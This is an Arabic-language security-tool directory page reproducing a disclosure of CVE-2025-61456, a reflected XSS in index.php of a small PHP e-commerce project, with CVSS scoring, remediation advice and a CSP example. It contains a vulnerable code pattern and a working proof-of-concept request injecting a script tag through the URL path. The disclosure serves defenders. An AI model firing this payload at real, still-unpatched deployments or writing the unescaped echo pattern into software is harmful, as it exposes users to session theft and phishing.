Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61456 — إفصاح عام وإثبات مفهوم لثغرة XSS المنعكسة (CVE-2025-61456) في مشروع تجارة إلكترونية، بما في ذلك التفاصيل التقنية، ودرجة CVSS، وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/tansique-17/cve-2025-61456
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubtansique-17/cve-2025-61456

CVE-2025-61456

إفصاح عام وإثبات مفهوم لثغرة XSS المنعكسة (CVE-2025-61456) في مشروع تجارة إلكترونية، بما في ذلك التفاصيل التقنية، ودرجة CVSS، وإرشادات المعالجة.

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ إفصاح عن ثغرة أمنية: CVE-2025-61456 — XSS منعكسة في مشروع التجارة الإلكترونية

تاريخ الإفصاح: 14 أكتوبر 2025
معرف CVE: CVE-2025-61456
الخطورة: متوسطة (CVSS 6.1)


🧩 الملخص

توجد ثغرة من نوع Cross-Site Scripting (XSS) المنعكسة في E-commerce Project v1.0، وتحديدًا داخل نقطة النهاية index.php. يتم عكس الإدخال غير المُنقّى في معامل مسار URL مباشرةً في استجابة HTML، مما يسمح للمهاجمين بتنفيذ JavaScript عشوائي في متصفح المستخدم الذي يزور رابطًا ضارًا أو يرسل طلبًا مُصممًا بعناية.

تم تخصيص المعرّف CVE-2025-61456 لهذه المشكلة. في وقت الإفصاح، لم يتم إصدار أي تصحيح من قِبل البائع.


📦 المنتج المتأثر

  • البائع: مستقل (Bhabishya-123)
  • المشروع: E-commerce
  • الإصدار: v1.0
  • الملف: index.php
  • نقطة النهاية المعرضة للخطر:

http://localhost/e-commerce-main/index.php

🔬 تفاصيل الثغرة

يفشل الخادم في تنقية معامل مسار URL بشكل صحيح في index.php قبل عكسه في استجابة HTML. وهذا يسمح للمهاجمين بحقن حمولات JavaScript عبر مسار URL، مما يؤدي إلى تنفيذ كود من جانب العميل.

يقوم المهاجم بصياغة إدخال يحتوي على محتوى نصي مضمّن يشبه السكربت وإرساله إلى نقطة النهاية GET المعرضة للخطر. نظرًا لأن الخادم يعكس الإدخال في استجابة HTML دون تطبيق ترميز HTML/سمات/JS مناسب، يعامل المتصفح المحتوى المنعكس كعلامات قابلة للتنفيذ ويقوم بتشغيلها. هذا سيناريو XSS منعكس (غير مستمر)؛ يجب على المهاجم إقناع الضحية بتنفيذ الطلب أو زيارة رابط/نموذج مُصمم خصيصًا.

نمط الكود المعرض للخطر (افتراضي):

root@kitploit:~
$path = $_SERVER['PATH_INFO'];
echo "<div>Path: $path</div>";

📌 تصنيف CWE

معرف CWEالعنوان
CWE-79تحييد غير صحيح للإدخال أثناء توليد صفحة الويب ('Cross-site Scripting')

📊 درجة CVSS v3.1

الدرجةالخطورةسلسلة المتجه
6.1متوسطةCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

💥 التأثير

قد يؤدي الاستغلال الناجح إلى:

  • 🧠 تنفيذ JavaScript عشوائي
  • 🎭 التصيد أو انتحال الشخصية عبر حقن HTML
  • 🍪 اختطاف الجلسة أو سرقة الرموز
  • 🚨 إعادة توجيه قسرية أو تسليم برمجيات خبيثة
  • 🎣 حصاد بيانات الاعتماد عبر نماذج تسجيل دخول مزيفة

🧪 إثبات المفهوم (PoC)

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/Bhabishya-123/E-commerce.git

2. الاستضافة محليًا

استخدم XAMPP/LAMP لنشر المشروع والوصول إلى التطبيق.

3. استغلال الثغرة

📥 طلب نموذجي

root@kitploit:~
GET /e-commerce-main/index.php/fmfct"><script>alert(1)</script>xfniu?id=unknown HTTP/1.1
Host: localhost

📋 الحمولة المحقونة

root@kitploit:~
fmfct"><script>alert(1)</script>xfniu

الشرح:
الحمولة "><script>alert(1)</script> تخرج من سياق HTML وتحقن تنبيه JavaScript. عندما ينقر الضحية على رابط ضار يحتوي على هذه الحمولة، يتم تنفيذ JavaScript في متصفحه.

4. النتيجة المتوقعة

إذا كانت الثغرة موجودة، سيقوم المتصفح بتنفيذ كود JavaScript، مع عرض مربع تنبيه بالقيمة 1.


🔐 التوصيات

  • ✅ استخدم htmlspecialchars() أو ما يعادله لترميز جميع المخرجات غير الموثوقة قبل عرضها في HTML.
  • 🧰 نفّذ التحقق من صحة الإدخال من جانب الخادم لجميع معاملات URL ومعلومات المسار.
  • 🧱 عيّن ترويسات Content Security Policy (CSP) قوية لمنع تنفيذ السكربتات المضمّنة.
  • 🚫 تجنب تضمين مدخلات المستخدم غير المنقّاة مباشرةً في استجابات HTML.
  • 🔒 نفّذ ترميز المخرجات المناسب بناءً على السياق (HTML، JavaScript، URL، CSS).

✅ مثال على الإصلاح

root@kitploit:~
$path = htmlspecialchars($_SERVER['PATH_INFO'], ENT_QUOTES, 'UTF-8');
echo "<div>Path: $path</div>";

🛡️ مثال على سياسة أمان المحتوى

root@kitploit:~
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'

📆 الجدول الزمني

الحدثالتاريخ
اكتشاف الثغرة16 سبتمبر 2025
الإفصاح العام13 أكتوبر 2025
التصحيح المتاح❌ غير متاح وقت الإفصاح

🙋‍♂️ الاعتمادات

تم اكتشاف هذه الثغرة والإفصاح عنها بواسطة:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 المراجع

  • OWASP - XSS
  • CWE-79 - تصنيف XSS
  • PortSwigger - Cross-site Scripting
  • CVE-2025-61456 على CVE.org

💬 تم نشر هذا التقرير بشكل مستقل نظرًا لغياب تصحيح رسمي من البائع.

تنزيل الأداة